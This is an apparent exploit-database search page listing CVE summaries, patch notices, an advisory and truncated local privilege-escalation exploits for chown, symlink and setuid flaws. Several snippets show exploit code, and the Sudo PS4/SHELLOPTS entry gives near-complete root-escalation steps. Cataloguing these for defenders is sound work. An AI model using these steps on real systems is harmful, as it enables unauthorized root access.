395 matches found
SuSE 11.3 Security Update : MySQL (SAT Patch Number 8217)
This version upgrade of mysql to 5.5.32 fixes multiple security issues : CVE-2013-1861 / CVE-2013-3783 / CVE-2013-3793 / CVE-2013-3794 / CVE-2013-3795 / CVE-2013-3796 / CVE-2013-3798 / CVE-2013-3801 / CVE-2013-3802 / CVE-2013-3804 / CVE-2013-3805 / CVE-2013-3806 / CVE-2013-3807 / CVE-2013-3808 /...
Setuid Nmap Exploit
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' require 'msf/core/post/common' require...
TPSparkyRoot
A bug in chmod, mkdir and chown means that they fail when the last element of their target path is a symlink...
FreeBSD - mbufs() sendfile Cache Poisoning Privilege Escalation
FreeBSD - mbufs sendfile Cache Poisoning Privilege Escalation / freebsd x86/x64 sendfile cache local root xpl v2 by Kingcope 2010 -- should h4x any freebsd 8. and 7. prior to 12Jul2010 tampers /bin/sh to contain a shellcode which does ' chmod a+s /tmp/sh chown root /tmp/sh execve /tmp/sh2 ' how t...
chown root:root /bin/sh x86 linux shellcode 48 bytes
48 bytes chown root:root /bin/sh x86 linux shellcode. Shellcode exploit for linux platform...
linux/x86 chown root:root /bin/sh shellcode 48 bytes
Exploit for linux/x86 platform in category shellcode: linux/x86 chown root:root /bin/sh shellcode 48 bytes...
Code injection
Unspecified vulnerability in the ZFS filesystem in Sun Solaris 10, and OpenSolaris snv_100 through snv_117, allows local users to bypass intended limitations of the file_chown_self privilege via certain uses of the chown system call...
CVE-2009-3706
CVE-2009-3706 affects the ZFS filesystem in Sun Solaris 10 and OpenSolaris snv_100–snv_117. A local attacker can bypass the file_chown_self privilege via certain uses of the chown system call, effectively bypassing intended limitations. The description does not specify concrete affected component...
Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit
No description provided by source. / $Id: raptorchown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $ raptorchown.c - syschown missing DAC controls on Linux Copyright c 2004 Marco Ivaldi [email protected] Unknown vulnerability in Linux kernel 2.x may allow local users to modify the group ID of file...
Design/Logic Flaw
The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories...
CVE-2008-0732
CVE-2008-0732 concerns the init script used by Apache Geronimo on SUSE Linux. The issue arises when the script follows symlinks during a chown operation, which could allow a local attacker to obtain access to unspecified files or directories. The available connected documents confirm the vulnerab...
SuSE 10 Security Update : Geronimo (ZYPP Patch Number 4967)
A chown in the geronimo init script could change ownership of directories it did not own, due to following symlinks. The default setup would corrupt /var/tmp on start.
XFS rc script race conditions
Insecure usage of chown on a temporary file allows changing the ownership of an arbitrary file...
iDefense Security Advisory 07.12.07: Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability
Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability iDefense Security Advisory 07.12.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 12, 2007 I. BACKGROUND XFS is the X Font Server, and is used to render fonts for the X Window System. "init.d" refers to the...
McAfee VirusScan for Mac (Virex) 7.7 - Local Privilege Escalation
!/usr/bin/perl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Following symlinks is bad mmmmmmmmmmkay! $dest = "/var/cron/tabs/root"; $tgts"0" = "Virex 7.7.dmg:"/Library/Application Support/Virex/VShieldExclude.txt" "; unless $target = @ARGV print "\n\nUsage: $0...
GLIBC (via /bin/su) Local Root Exploit
No description provided by source. / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of /bin/su program with the address of the shellcode, so, the program executes it when main returns or exit is called Thanks a lot to rwxrwxr...
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)
/ $Id: raptorprctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ raptorprctl.c - Linux 2.6.x suiddumpable vulnerability Copyright c 2006 Marco Ivaldi The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of...
Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation
Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...
linux/x86 chroot & standart 66 bytes
No description provided by source. Linux/x86 chroot and standart shellcode. By Okti http://okti.nm.ru ---------------------------------------------------------------------------------------------- / Mkdir and Chroot are written in C: / includestdio.h includeunistd.h includesys/types.h...
cdrdao (Mandrake 10.2) - Local Privilege Escalation
cdrdao Mandrake 10.2 - Local Privilege Escalation !/bin/sh cdrdao local root exploit newbug at chroot.org IRC: irc.chroot.org chroot May 2005 echo "cdrdao private exploit" echo "This exploit only for Mandrake series" echo "newbug at chroot.org" echo "May 2005" echo "checking if cdrdao is setuid...